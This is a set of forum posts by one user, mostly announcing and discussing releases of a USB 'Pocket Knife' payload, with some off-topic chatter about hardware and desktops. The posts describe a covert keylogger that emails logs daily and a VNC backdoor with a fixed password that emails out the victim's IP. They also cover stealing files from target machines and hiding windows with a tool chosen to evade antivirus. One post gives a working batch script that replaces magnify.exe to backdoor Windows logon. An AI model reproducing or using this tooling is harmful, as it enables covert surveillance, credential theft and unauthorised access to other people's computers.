Leapo

I'm working on moding the USB wiretap to email logs off daily, that what you're looking for?

UPDATE: VERSION 0.6.2.3 IS OUT! This is a quick experimental release for you all to try out. I've made some major changes that, by all accounts, should work just fine. I haven't actually had a chance to try this, so if you're looking for a release that's sure to work refer to my previous post with the last stable release (Version 0.6.2.1). I won't be appending this version to the front page until I'm sure I have all the kinks worked out. Like I said, it should work just fine, but for all I know I broke the whole works Keyloger - NEW FEATURE I've heavily modified the USB wiretap and added a few new features to it. When activated in Start.bat, it installs in the same manner as the USB hacksaw and begins logging keystrokes as soon as the current user logs off and logs back on (I'm working on a way to make it start without a relog). You may either run the payload again to collect logs, or give it your email address and it will email you the logs daily (just like the hacksaw). Silent Operation - OVERHAULED I found a nifty little app on MSFN forums created for the sole purpose of hiding command prompts. I realize that nircmd has quite a few more features over this new app, but there's a major upside. This new app isn't detected by ANY antivirus as a hacktool, which means more of the payload will now run on systems that kill Nircmd. I also fixed a small bug where the start.bat command prompt would pop up when starting the payload from the autorun dialog box. DOWNLOAD THE USB POCKET KNIFE V0.6.2.3 Keep in mind, this release is experimental! if you want the latest stable release, go back a page and grab 0.6.2.1! Download Mirrors: RapidShare Megaupload Note: this new version is NOT compatible with the U3 ISO in my first post as of yet, I'm putting together a few different versions of the launcher ISO, so watch out for that.

I ran across this little gem a couple of days ago, anybody have any experience with it? Looks like it might be a great alternative to nircmd for hiding console windows: http://www.msfn.org/board/index.php?showtopic=49184

Slight problem with 110mb.com, they aren't accepting registrations until the 14th due to a server move. EDIT: ok, there registration is up, but what we want to do boarders on violating their TOS (which means perma-ban and if the deem necessary, being reported to the authorities). Got a loser hosting service we can use?

Yeah, that's one of the few down sides to running the payload off of the U3 partition. You could make an app that updates the image and automatically re flashes it, but that's kinda a pain in the ass. And yeah, lets get that server set up, it'll be a great resource for all the payloads in development here. How should we go about this, you want me to just go ahead and register with them now?

Yeah, i want to give that a shot, I just need to get a server set up that I can let everybody who uses my payload access for updates. I was thinking of setting up a free site at 50megs.com since all I need is FTP access to a few text files...think that'll be enough?

There's a little more to it than just wget commands, as the files come down zipped, and there's extra garbage in the zip files we don't want. This is the general breakdown: - Wget goes out and downloads all the files - The CLI version of 7zip extracts everything into a temp folder. - Files are copied to the proper locations. - Attributes flags are set for the new files (read only, hidden, system). Works pretty darn well, except in situations where the download link changes with version number. There's no good way to feed Wget a wildcard, so I have to manually tell it to poll the website for versions that might not exist yet (as is the case with pwdump). It works fantastically for programs where the download link stays the same, though.

UPDATE: VERSION 0.6.2.1 IS OUT! Ok guys, you've waiting a LONG time, but here it is, my lazy ass is finally releasing a new version of my payload. I've made some insanely cool new features that, as far as I can know, are brand new and never-before-seen Quick update list (I'll be revising the first post in this thread shortly and making a wiki page): VNC install method - OVERHAULED I had heard some were having issues with the way I was installing VNC, so I went ahead and plugged in a new variant of the VNC installer. Password is still "yougothacked", and it's open on port 80 as well as 5900. Once configured properly with your gmail account, ti will also email you the external IP of the infected system. Backup and Restore script - OVERHAULED Narrowed down the amount of items being backed up and restored, optimized the restore process, and used a lower compression value on the archive to make restoring from it quicker. Automatic Updates - NEW FEATURE Yes, you read that right. I've created a single simple script that will download the latest versions of many of the tools used on the switchblade, extract them, and install them into the payload automatically. After the update process has finished, the extra files are cleaned up and the backup archive is rebuilt. Automatically Compress Logs - NEW FEATURE I've added a switch in Start.bat that, when enabled, will automatically compress log files as they are generated to save space on your flash drive. Not all that useful if log files is all you're collecting, but if you're slurping files, this should let you store a bit more data. Centralized Management Interface - NEW FEATURE Most that have used my payload know about the slew of batch files that were appearing on the root of the drive to run various functions, and how messy it was beginning to look; fear not, for that little problem has been rectified once and for all! There's now just one batch file called Menu.bat which will assist you in all of your management needs. This simple GUI allows you to do any of the following: - Open Start.bat with Notepad++ (included with my payload, can be found in X:DocumentsNotepad) - Force a manual backup of the flash drive . - Force a manual restore of the flash drive. - Run the Auto-Update script described above. - Run the payload. - Drop back to the normal command line. DOWNLOAD THE USB POCKET KNIFE V0.6.2.1 Yes, I know the version number took a jump, I've been working on this for a while, just go with it :P Download Mirrors: RapidShare Megaupload Note: this new version is NOT compatable with the U3 ISO in my first post as of yet, that will be fixed shortly.

Oh my god, you were right, the cake WAS a lie :shock: (To everybody who doesn't get the joke, go on STEAM and buy The Orange Box now)

Ok, I simpsonized myself...then took it into photoshop, enlarged it, cleaned it up, and made it look half way decent.

Just going to list my desktop, file server, and laptop... Desktop Gaming PC CASE: Lian-Li PC 65b (moded to accommodate all 120mm fans) CPU: AMD Athlon 64 3400+ @ 2.7Ghz (Socket 754, Venice Core, 512KB L2 cahce) RAM: 2GB (2x1024MB) M/B: EPoX 8NPA SLI GFX: Nvidia GeForce 8800GTS 320MB @ 680MHz Core, 1800MHz RAM HDD: Around 800GB total drive space DVD: Pionner 16x DVD+-RW DL O/S: MS Windows XP Home Gaming Laptop Model: Everex XT5000T Product Link: http://www.everex.com/products/xt5000t/xt5000t.htm Newegg Link: http://www.newegg.com/Product/Product.aspx...amp;Tpk=xt5000t HDD Upgrade: second internal 100GB drive (Not running RAID, though it is supported) RAM Upgrade: second 1GB stick GFX Upgrade: 7600Go 256mb overclocked to 7600GT speeds File Server CASE: Thermaltake Centurion CPU: AMD Athlon XP 1300+ @ 1.3Ghz (Socket A, Palermo Core, 256KB L2 cahce) RAM: 512MB (2x256MB) M/B: PC Chips Generic Brand GFX: Nvidia GeForce 2 MX400 HDD: 4.3TB total drive space DVD: 8X generic DVD-ROM O/S: MS Windows Server 2003

that works, but isn't it a tad bloated and overcomplicated? The way I wrote it up doesn't need to search every drive in the system to work...

Heh, interesting way of doing it...why not just let it create the standard log files (no need to edit go.bat), then make a second batch file (launched by start.bat) that emails those logs? same result, no need to edit an existing component...you know what, I'll add the option to email all generated logs to the default pocket knife

yes, yes, I know my payload appears dead, but I am still playing with it. A fully U3 version is being worked on, and I have a small update to the non-U3 payload that I could probabbly release this weekend (a GUI to change settings). The U3 version will have everything moved over to the CD partition, and I've improved the RAR script on the non-U3 version so the backups are smaller and take less time to extract. Don't count me out yet, I'm also cannibalizing GonZor's payload and adding everything I don't have from it to both versions of my payload....sure my code isn't as clean, but meh, now that it has GUI, that isn't a huge issue. I might go ahead and release "streamlined" variations of my payload, with all the human-friendly formatting and comments removed so that the files are smaller, run faster, and backup/restore faster. Yeah, I'll release the updated non-U3 version tomorrow morning, so watch out for that :)

wouldn't be that hard, really. All that's required DOS boot floppy (or CD) with an NTFS driver that automatically runs a batch file that replaces Magnify.exe with your modified version. Insert floppy (or bootable CD) > boot machine > script runs > reboot into windows > use exploit Edit: Here's all the code that's required for the batch file: copy C:WINDOWSsystem32magnify.exe C:WINDOWSsystem32magnify_bak.exe del C:WINDOWSsystem32magnify.exe copy .magnify.exe C:WINDOWSsystem32 exit And this will undo it: del C:WINDOWSsystem32magnify.exe copy C:WINDOWSsystem32magnify_bak.exe C:WINDOWSsystem32magnify.exe del C:WINDOWSsystem32magnify_bak.exe exit Yes, I know I could have used "ren" instead of "copy" and "del", but I've had issues doing it that way without actually changing to the working directory. This will work for sure.

Darn, slight miscalculation on my part. Now I've got to figure out a good way to combine the two...

Who cares about the dudes shriveled penis, has nobody noticed the highly disturbing noodle monster???

The current Winrar script works well enough, but yeah, TrueCrypt will provide the be-all end-all solution. As for community help...there are still those code snippets I posted up that are royally b0rked, if somebody could sort those out I would immediately throw up a new version of my payload (still based on the old code branch you've all been using, it will take a while yet to sort out all the bugs with the U3 version).

Just a little update, I'm not dead! My U3 drive is here and I'm working on converting my code over to be completely U3 compatible (files in danger of being deleted on the U3 partition). You can expect a non-U3 variation using TrueCrypt very shortly after the U3 version is done. Every body just hang on, I'll get this sorted eventually 8)

Ok, we have a few things to go over here. When you "comment something out", you're telling the computer to ignore a specific command and continue down to the next thing that isn't commented out. You'll probably notice all of my batch file comments have a "::" before them, this is so my comments aren't read when my code is executed. You can also use :: to disable certain aspects of my batch files by simply adding :: in front of the code you want disabled. You may also want to go back and throughly read the included readme, as it appears you may have skipped a bit. For my payload, when you want to disable something, you don't need to edit the individual batch files; everything is controlled from within Start.bat (which is also fully commented). Navigate to WIPCMD and edit Start.bat by commenting out the lines that start fc_slurp and fc_slurp2.bat. Here's what the section of Start.bad pertaining to file slurping should look like after you've commented out the entires: :: Slurps smaller files like logs, chat logs, bookmarks, etc from the target. This component :: of slurp should be safe to run on smaller storage devices and flash drives, because it :: shouldn't need to copy anything larger than a log file. :: :: In any case, keep in mind it'll probably take a while to copy over everything (a few minutes). ::nircmd execmd CALL .fc_slurp.bat :: Slurps everything in the My Documents, Shared Cocuments, and the desktop (includes sub-folders). :: This second components of slurp will most likely copy a LOT of large files to the switchblade. :: :: This is turned on by default, but you might want to disable this if you're not running from a :: decently large storage device (like an external hard disk). :: :: In any case, keep in mind it'll probably take a while to copy over everything (depending on what :: the target has stored in their My Documents folder). ::nircmd execmd CALL .fc_slurp2.bat As simple as that, all I did was add a :: to the lines that started the batch files.

Notice that after all that, if he had simply tried pulling it would have swung right open...

Ok now, be honest, you didn't make that

I like it Aingeal! May I ask what visual style you're using (looks sorta plex-ish)?

I would gladly make it into a flash animation with sound if the crew were to record their voices

Same as last time for the most part, new wallpaper (This is XP, not Vista)